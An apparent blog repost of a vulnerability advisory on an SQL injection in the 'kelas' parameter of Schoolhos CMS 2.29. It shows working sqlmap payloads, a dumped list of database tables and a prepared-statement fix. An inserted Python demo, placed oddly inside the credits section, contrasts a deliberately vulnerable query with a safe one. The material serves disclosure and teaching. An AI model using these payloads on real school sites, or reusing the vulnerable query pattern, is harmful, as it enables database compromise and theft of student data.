Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection
Holaaaaa, good evening, RZLabs friends. Tonight I am going to share some information about an exploit for a school CMS, Schoolhos CMS 2.29, which has an SQL injection vulnerability. To see what the exploit looks like, read this article.
Info:
Technical Detail and Description:
Doc Title: Schoolhos CMS v2.29 - SQL Injection Vulnerability
Exploit Type: SQL Injection Vulnerability
Exploitation Technique: Remote
Severity Level: High
Author: Vulnerability-Lab
Release Date: 2016-11-07
Vendor Homepage: Schoolhos
Latest CMS Download: CMS Schoolhos Download
Vuln CMS Download: Vulnerable App
A remote SQL injection web vulnerability has been discovered in the official Schoolhos v2_29 content management system. The web vulnerability allows remote attackers to execute their own malicious SQL commands to compromise the application or the DBMS. The SQL injection vulnerability is located in the `kelas` parameter of the `index.php?p=siswakelas` module POST method request. Remote attackers are able to execute their own SQL commands by use of an insecure POST method request through the vulnerable parameter of the application. The attack vector of the vulnerability is application-side and the request method to inject is POST. The security vulnerability in the content management system is a classic SELECT remote SQL injection. The security risk of the vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.7. Exploitation of the remote SQL injection vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote SQL injection results in database management system, web-server and web-application compromise.
Proof of Concept ( PoC ):
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] ./SCRIPTPATH/index.php?p=siswakelas
Vulnerable Parameter(s):
[+] kelas
The remote SQL injection web vulnerability can be exploited by remote attackers without a privileged web-application user account and without user interaction.
For security demonstration or to reproduce the SQL injection web vulnerability, follow the provided information and the steps below to continue.
PoC Session Logs:
[+] Place: POST > Parameter: kelas
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: kelas=-2062' UNION ALL SELECT NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd
---
[21 tables]
+-----------------+
| sh_agenda       |
| sh_album        |
| sh_berita       |
| sh_buku_tamu    |
| sh_galeri       |
| sh_guru_staff   |
| sh_info_sekolah |
| sh_jabatan      |
| sh_kategori     |
| sh_kelas        |
| sh_komentar     |
| sh_mapel        |
| sh_materi       |
| sh_pengaturan   |
| sh_pengumuman   |
| sh_psb          |
| sh_sidebar      |
| sh_siswa        |
| sh_statistik    |
| sh_tema         |
| sh_users        |
+-----------------+
Solution - Fix and Patch:
The SQL injection vulnerability in the `kelas` parameter of the `index.php` file POST method request can be patched by a secure use of prepared statements. Parse the parameters and encode the values to a safe format to prevent further SQL injection attacks. Escape the parameters and disallow the usage of special characters.
Credits and Authors:
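To make that fix concrete, here is an added example (my own, not code from the advisory or from Schoolhos CMS) that puts the vulnerable query pattern beside the prepared-statement version and the "disallow special characters" input check the advisory recommends. It uses SQLite in place of MySQL so it runs offline; the table name sh_siswa comes from the sqlmap table list above, while its columns, its rows and the numeric-only rule for `kelas` are assumptions made for this demo. The boolean-based probe is the one from the PoC log; the same probe with its comparison made false shows the yes/no difference that a blind injection depends on, and why the prepared version answers both the same way.

```python
# Added example (not code from the advisory or the Schoolhos project):
# the `kelas` lookup written two ways, run against an in-memory SQLite table.
# The table name sh_siswa is from the advisory's sqlmap output; its columns
# and rows are constructed for this demo.
import re
import sqlite3

# First payload: the boolean-based blind probe from the advisory's PoC log.
# Second: the same probe with the comparison made false, so the difference in
# the two responses (the oracle) can be observed against each query style.
PAYLOAD_TRUE = "1' AND 4945=4945 AND 'SfWY'='SfWY"
PAYLOAD_FALSE = "1' AND 4945=4946 AND 'SfWY'='SfWY"


def make_db():
    """Constructed stand-in for the CMS student table (columns assumed)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE sh_siswa (id INTEGER PRIMARY KEY, nama TEXT, kelas TEXT)"
    )
    con.executemany(
        "INSERT INTO sh_siswa (nama, kelas) VALUES (?, ?)",
        [("Andi", "1"), ("Budi", "1"), ("Citra", "2"), ("Dewi", "3")],
    )
    return con


def siswa_by_kelas_vulnerable(con, kelas):
    """The pattern the advisory describes: the POST value is spliced into the
    query text, so the quote in the payload closes the string literal and the
    remainder is parsed as SQL."""
    sql = "SELECT nama FROM sh_siswa WHERE kelas = '" + kelas + "' ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def siswa_by_kelas_prepared(con, kelas):
    """The advisory's fix: a prepared statement. The value is bound as data,
    so the whole payload is compared with the kelas column as one string."""
    sql = "SELECT nama FROM sh_siswa WHERE kelas = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (kelas,))]


def is_valid_kelas(kelas):
    """The advisory's second layer: reject special characters before the value
    reaches the query. Class identifiers are assumed to be short numbers."""
    return re.fullmatch(r"[0-9]{1,4}", kelas) is not None


def lookup(con, kelas):
    """Hardened handler: validate first, then run the prepared statement.
    Returns None where the real handler would answer HTTP 400."""
    if not is_valid_kelas(kelas):
        return None
    return siswa_by_kelas_prepared(con, kelas)


if __name__ == "__main__":
    con = make_db()
    for label, fn in (("vulnerable", siswa_by_kelas_vulnerable),
                      ("prepared", siswa_by_kelas_prepared)):
        for value in ("1", PAYLOAD_TRUE, PAYLOAD_FALSE):
            print(f"{label:10s} kelas={value!r:42} -> {fn(con, value)}")
    print("validator:", is_valid_kelas("1"), is_valid_kelas(PAYLOAD_TRUE))
```

Running it shows the vulnerable function returning the class-1 rows for the true probe and nothing for the false one, which is exactly the signal sqlmap used to confirm the boolean-based blind finding, while the prepared version returns an empty list for both because neither string is a class name. In the PHP code base the advisory concerns, the equivalent of the prepared function is a PDO or mysqli prepared statement with a bound parameter, and the validator sits in front of it.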
Vulnerability Laboratory [Research Team] - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)
Disclaimer and Information:
Domains: Vulnerability Lab - Vuln Lab - Evolution
Section: Magazine - Vuln Lab Contact - Evolution Contact
Social: Twitter Vuln Lab - Facebook Vuln Lab
Feeds: Vuln Lab RSS - Upcoming - News
References [Source]:
Vuln Lab article
Exploit DB
That is all for the article I have written. Sorry for any shortcomings, friends. I hope it is useful ^_^. Don't forget to like and share this post ^_^.

